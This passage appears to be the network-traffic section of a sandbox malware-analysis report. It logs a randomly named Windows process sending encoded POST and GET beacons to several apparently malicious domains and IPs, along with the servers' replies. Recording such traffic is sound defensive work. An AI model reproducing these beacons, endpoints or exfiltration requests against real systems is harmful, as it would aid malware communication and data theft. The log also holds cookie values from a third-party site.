                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:49 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.11.30 | 49916 | 134.119.247.136 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:51.692873001 CEST | 2578 | OUT | POST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY= [TRUNCATED]
                                              Sep 24, 2024 11:27:51.692890882 CEST | 1332 | OUT |
                                              Data Ascii: 7FFPlQ23EahwXe6un8Jxvfgh7tk8lQsrkLwtEtNqtPQExiTTMM9T+9gmK2d+SrGKWXQHXDLlttYa0eiIY3qSMdlo96GY+/EWkkqJAI8A1OzMvve/UPqP5zZJt+QL/dklwmJQxNZNFt7QJGDzND9zzXN/Ik5I9PAIfwstIfBtIguM+WOGuTsXw8wQA8htBdvmNj2ETp7X9pcchAmBS25gViQU3PhMyobOeZoKEWFMlmZbxWgmJxS
                                              Sep 24, 2024 11:27:51.886337042 CEST | 401 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:51 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              24 | 192.168.11.30 | 49917 | 134.119.247.136 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:54.416455984 CEST | 496 | OUT | GET /tohg/?7LY=yjqzcBzk86gS97o1hEgN6leh0gqiWIOHs+n5cGEGjSIKUxpSNCnE5Wq2EyXzrtnAt0SEhBRJIzSMRq3CHi5k3dz0/t/HC6DV0cbuHslMoBzbtjkOL7N7Vc4=&Nze=C0klVT HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:54.609673023 CEST | 382 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:54 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 196
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              25 | 192.168.11.30 | 49918 | 221.121.144.149 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:09.547265053 CEST | 782 | OUT | POST /ekqf/ HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.inf30027group23.xyz
                                              Referer: http://www.inf30027group23.xyz/ekqf/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=ymZRNIcmYU9oPzWQQRqYpYV6kqn9y48xyCFVmdWdMBqZbXNJarK0rSZt633eDfLbSkYMWkN/2CyPvlsy8yDzKnUhj6GKbrGgBu0aP3zoeagkd+rxSwudL8gyq2Jz3+Y5MRFY2dLuo+WVfsEkxFQVVa7OiaL+wan2FZugAKSFt4Rf5/QKNPj1CsDI+ZSwm0lmEg==
                                              Sep 24, 2024 11:28:10.588365078 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              x-litespeed-tag: 3da_HTTP.404
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              content-type: text/html; charset=UTF-8
                                              link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
                                              x-litespeed-cache-control: no-cache
                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                              transfer-encoding: chunked
                                              content-encoding: br
                                              vary: Accept-Encoding
                                              date: Tue, 24 Sep 2024 09:28:10 GMT
                                              server: LiteSpeed


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              26 | 192.168.11.30 | 49919 | 221.121.144.149 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:12.396378994 CEST | 802 | OUT | POST /ekqf/ HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.inf30027group23.xyz
                                              Referer: http://www.inf30027group23.xyz/ekqf/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=ymZRNIcmYU9oPSmQcSSYu4V59an9oI8PyCBVmcS3Mz+ZbypJbqK0myZtyX3bevLmSkEyWmJ/2CmPvkcy9BryL3U/raGIWLGgBu0aP3ONea4kdtzxRVCeGcgzjWJz9eY9MREN2f/Uo4KVfuck/wwSea7It6Ke84StEr6GNZ2HirVnxIhQQMX3RM/liY/Yk2k9Zrwvc4/F6MsZhuuVNqKY+Cs=
                                              Sep 24, 2024 11:28:13.349762917 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              x-litespeed-tag: 3da_HTTP.404
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              content-type: text/html; charset=UTF-8
                                              link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
                                              x-litespeed-cache-control: no-cache
                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                              transfer-encoding: chunked
                                              content-encoding: br
                                              vary: Accept-Encoding
                                              date: Tue, 24 Sep 2024 09:28:13 GMT
                                              server: LiteSpeed


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              27 | 192.168.11.30 | 49920 | 221.121.144.149 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:15.238831997 CEST | 1289 | OUT | POST /ekqf/ HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.inf30027group23.xyz
                                              Referer: http://www.inf30027group23.xyz/ekqf/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=ymZRNIcmYU9oPSmQcSSYu4V59an9oI8PyCBVmcS3MyGZbghJaJi0pSZt433aevLBSkcuWmUd2GWP9XEytgryFHU/paGNbrHiBukeP2yNea4kdrfxFwueEcgyq2J33+YFMXt22f7Eo+eVedkk/EQSea7IjaKf84OoEtSsNYO9lYZn1ZBNK9nLTvPvh5Svm3MeZIg3Y7bkwvAFsrexJY+crWYZAtqogjLVVTTfARnEMJ27J+/Fu6Anbac1kV4fB6ZtftLEMNQ4ND8Ot9J1i1fOjYC/ki4RY1GJtON44XcVnDx5I3PsKpHD+f6UEEQgMonKJeWU1/ODyzfqlF5YDrqZU0ywTaYlI8c8IK5qrUvY4Av/+ZKphsUyJQ7idkF3Cbf3pHXxwi1NEGX/GXRmUgpVMiVwLfcQNFkgTJs96sSczWRy51p1G46VcLg+UZRlWD5cQ9fsraeUxb/Ak74xbCctVZNR1YjuBPlZafakj5+lUROtMPPjVlJIxZkjgEg5j/XXxxWQz4MrpNUUeGje3VB5t5gxBaMkdMCbrPyrXEdqYHl4wXV+taIDW8cz7hIHbNSVceBhElg62VZ4OdoVpYVKTQ4iKYLKJQPJwuYzCl6S7CzcEjhDIlHgQZtrWLIyHfkNIfBT9cxKXLyGqXZc2s5+ib++cfWljdVhCVx2UaBwhosn5tRlFFXRlOFzpFRlWq
                                              Sep 24, 2024 11:28:16.174061060 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              x-litespeed-tag: 3da_HTTP.404
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              content-type: text/html; charset=UTF-8
                                              link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
                                              x-litespeed-cache-control: no-cache
                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                              transfer-encoding: chunked
                                              content-encoding: br
                                              vary: Accept-Encoding
                                              date: Tue, 24 Sep 2024 09:28:16 GMT
                                              server: LiteSpeed


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              28 | 192.168.11.30 | 49921 | 221.121.144.149 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:18.077303886 CEST | 499 | OUT | GET /ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVT HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:18.747298002 CEST | 613 | IN | HTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              cache-control: no-cache, must-revalidate, max-age=0
                                              content-type: text/html; charset=UTF-8
                                              x-redirect-by: WordPress
                                              location: http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVT
                                              x-litespeed-cache-control: public,max-age=3600
                                              x-litespeed-tag: 3da_HTTP.404,3da_HTTP.301,3da_404,3da_URL.eaddfd689b6edbf929721ed03ee3c9e9,3da_
                                              content-length: 0
                                              date: Tue, 24 Sep 2024 09:28:18 GMT
                                              server: LiteSpeed


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              29 | 192.168.11.30 | 49922 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:24.164132118 CEST | 770 | OUT | POST /0nxw/ HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.rmgltd.services
                                              Referer: http://www.rmgltd.services/0nxw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 59 42 69 31 43 2b 71 2f 39 37 6b 68 65 33 33 6c 30 35 6d 69 65 48 73 35 2b 4e 32 6c 71 64 61 42 4c 31 47 32 65 6b 65 4b 70 61 74 71 78 74 34 69 39 38 50 34 4a 76 78 74 33 47 6a 6e 79 73 39 71 51 75 42 44 2f 5a 70 48 37 78 2f 46 58 6c 53 4a 4c 35 53 69 38 42 74 70 38 49 68 30 49 75 2f 78 51 4a 35 72 74 4c 2b 49 58 42 6f 58 4e 50 33 39 54 37 43 30 53 70 68 35 75 4f 4f 71 35 70 7a 32 72 67 58 43 77 6d 6f 64 5a 4a 37 64 4a 76 31 5a 50 75 30 39 42 2f 4d 6e 66 4b 6d 47 45 71 59 33 35 63 6b 6c 31 50 50 54 53 32 55 6f 50 33 66 35 71 36 76 77 44 41 78 42 77 64 45 69 61 36 43 74 2f 77 3d 3d
                                              Data Ascii: 7LY=YBi1C+q/97khe33l05mieHs5+N2lqdaBL1G2ekeKpatqxt4i98P4Jvxt3Gjnys9qQuBD/ZpH7x/FXlSJL5Si8Btp8Ih0Iu/xQJ5rtL+IXBoXNP39T7C0Sph5uOOq5pz2rgXCwmodZJ7dJv1ZPu09B/MnfKmGEqY35ckl1PPTS2UoP3f5q6vwDAxBwdEia6Ct/w==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              30 | 192.168.11.30 | 49923 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:26.807982922 CEST | 790 | OUT | POST /0nxw/ HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.rmgltd.services
                                              Referer: http://www.rmgltd.services/0nxw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 59 42 69 31 43 2b 71 2f 39 37 6b 68 59 57 48 6c 32 59 6d 69 56 48 73 36 69 64 32 6c 6a 39 61 46 4c 31 4b 32 65 68 76 50 71 70 4a 71 6f 4a 38 69 38 39 50 34 4f 76 78 74 39 6d 6a 69 76 63 39 6a 51 75 63 30 2f 5a 56 48 37 78 72 46 58 67 75 4a 4c 4f 4f 6a 2b 52 74 72 6c 34 68 79 58 2b 2f 78 51 4a 35 72 74 4c 44 6a 58 48 41 58 4e 2f 6e 39 54 5a 71 37 4d 35 68 32 70 4f 4f 71 71 35 7a 79 72 67 58 77 77 6e 30 6e 5a 50 6e 64 4a 75 46 5a 42 66 30 2b 59 50 4d 6c 52 71 6e 42 4e 37 31 61 31 74 77 44 79 34 57 4e 65 31 70 57 44 41 75 6a 33 35 62 79 51 67 4e 73 73 63 70 4b 59 34 44 32 69 32 49 59 74 78 6b 6e 4e 67 32 30 34 66 4e 68 6d 74 6b 4c 62 78 55 3d
                                              Data Ascii: 7LY=YBi1C+q/97khYWHl2YmiVHs6id2lj9aFL1K2ehvPqpJqoJ8i89P4Ovxt9mjivc9jQuc0/ZVH7xrFXguJLOOj+Rtrl4hyX+/xQJ5rtLDjXHAXN/n9TZq7M5h2pOOqq5zyrgXwwn0nZPndJuFZBf0+YPMlRqnBN71a1twDy4WNe1pWDAuj35byQgNsscpKY4D2i2IYtxknNg204fNhmtkLbxU=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31 | 192.168.11.30 | 49924 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:29.448133945 CEST | 2578 | OUT | POST /0nxw/ HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.rmgltd.services
                                              Referer: http://www.rmgltd.services/0nxw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              32 | 192.168.11.30 | 49925 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:32.084151030 CEST | 495 | OUT | GET /0nxw/?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg= HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:32.188455105 CEST | 390 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:28:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 7a 65 3d 43 30 6b 6c 56 54 26 37 4c 59 3d 56 44 4b 56 42 4a 4f 41 2f 62 4d 47 52 6a 7a 6e 6e 36 65 53 65 6d 73 38 69 50 6d 63 76 63 76 52 54 47 57 63 59 68 53 41 68 35 70 79 30 76 35 36 38 4a 72 42 41 4e 78 77 78 54 54 64 73 4a 59 78 65 2b 6f 51 35 59 34 38 33 6b 62 73 54 67 79 76 61 50 62 61 32 6c 49 48 6c 72 6c 45 59 4e 76 68 59 74 31 72 2f 64 2b 4d 4a 58 55 43 52 70 6e 69 56 4b 37 62 45 4e 67 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg="}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              33 | 192.168.11.30 | 49926 | 85.153.138.113 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:38.093656063 CEST | 761 | OUT | POST /xzdz/ HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.mfgarage.net
                                              Referer: http://www.mfgarage.net/xzdz/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 38 35 4e 31 45 70 31 68 6d 62 62 51 6c 66 63 2f 6d 58 37 52 62 35 39 37 63 76 68 55 38 52 56 56 69 74 52 49 68 54 67 6f 68 64 6e 6e 4d 55 73 30 54 64 41 4a 64 58 68 71 6a 62 4c 67 52 73 63 37 64 30 32 61 2b 53 79 2b 70 4c 4f 62 6b 30 6c 72 6f 37 6d 61 4b 58 34 2f 55 4a 47 6a 63 59 4d 50 74 4d 4f 67 46 54 50 33 73 57 37 62 56 32 69 6e 43 70 6b 42 54 4a 6e 7a 50 69 66 53 42 4a 35 50 35 7a 2b 4f 58 55 51 67 31 71 75 7a 42 58 71 43 56 32 4d 56 69 30 41 35 4c 6b 78 57 70 76 4d 37 4a 65 57 69 69 76 4d 68 37 74 35 61 77 59 79 66 67 73 68 4a 6f 77 74 78 61 39 58 64 59 53 44 2b 63 67 3d 3d
                                              Data Ascii: 7LY=85N1Ep1hmbbQlfc/mX7Rb597cvhU8RVVitRIhTgohdnnMUs0TdAJdXhqjbLgRsc7d02a+Sy+pLObk0lro7maKX4/UJGjcYMPtMOgFTP3sW7bV2inCpkBTJnzPifSBJ5P5z+OXUQg1quzBXqCV2MVi0A5LkxWpvM7JeWiivMh7t5awYyfgshJowtxa9XdYSD+cg==
                                              Sep 24, 2024 11:28:38.340349913 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=149; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=Ih3u1RiCyG56SBms66f28646; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=1-1VZhdMf-6ueTIn4yoxtA-_QVepF0luNhlL7d02PmdpdOx6SOndu4OKzIDDY1_fSEd-cD_WZPyPi8wbpuqQOw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=WGTmAZ735tJzCPIMmpkxeh3i8otwApyjOfsI3zi7RUZYDbGCwCq_mAtmmDuj1_Cfirye-eTBVzPdABQcAEc8Nw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=kmC-rQXnV551daTsdzm7un-NEUxgDsVjkYM-_94wxBco287eNUmg6TpkfbcSlnKiBiB2bWcakOIfDF6evl-0dPfjQzck3-R4d2U6wxG74va9ZOlwWjE82D8QwG_PMeJ-VnJ_VUcXFagpwIQd20p_cC3TT9QV0Q92eEHavI64Y8BE7odmnMAnySf9eMljc71hW5oz1xrCAHkvt3V1M6FzM2Y23sD5n6aj-lctY89_VsrI4AyY2Pc_Ub7Vaa5fg5_uz6yW7MywnD3Ix2LRAS48pznF9_QGGWMOJ0SoQivXOVAuUCz7eu90tARBRE
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:38.340362072 CEST | 240 | IN | Data Raw: 68 38 67 34 38 43 5f 47 64 4e 74 52 42 59 34 46 76 52 61 68 4d 71 61 4a 44 46 4c 71 35 6c 33 50 6f 54 56 5f 64 52 71 7a 75 6a 37 48 54 4e 37 74 6d 76 52 4f 37 46 6b 42 58 62 67 4a 6d 70 71 31 42 70 57 56 61 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68
                                              Data Ascii: h8g48C_GdNtRBY4FvRahMqaJDFLq5l3PoTV_dRqzuj7HTN7tmvRO7FkBXbgJmpq1BpWVa; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:38 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:38.340373039 CEST | 183 | IN | Data Raw: 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 66 67 61 72 61 67 65 2e 6e 65 74 25 32 46 78 7a 64 7a 25 32 46 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 54 75 65 2c 20 32 34 20 53 65 70 20 32 30 32 34
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2Fcontent-length: 0date: Tue, 24 Sep 2024 09:28:37 GMTserver: Sahibinden Web ServersX-Proxy: tmll-34 13,20200X-SECURE-OPTION: secure
                                              Sep 24, 2024 11:28:38.549211025 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=149; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=Ih3u1RiCyG56SBms66f28646; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=1-1VZhdMf-6ueTIn4yoxtA-_QVepF0luNhlL7d02PmdpdOx6SOndu4OKzIDDY1_fSEd-cD_WZPyPi8wbpuqQOw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=WGTmAZ735tJzCPIMmpkxeh3i8otwApyjOfsI3zi7RUZYDbGCwCq_mAtmmDuj1_Cfirye-eTBVzPdABQcAEc8Nw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:38 GMT; Path=/; Secure; SameSite=None
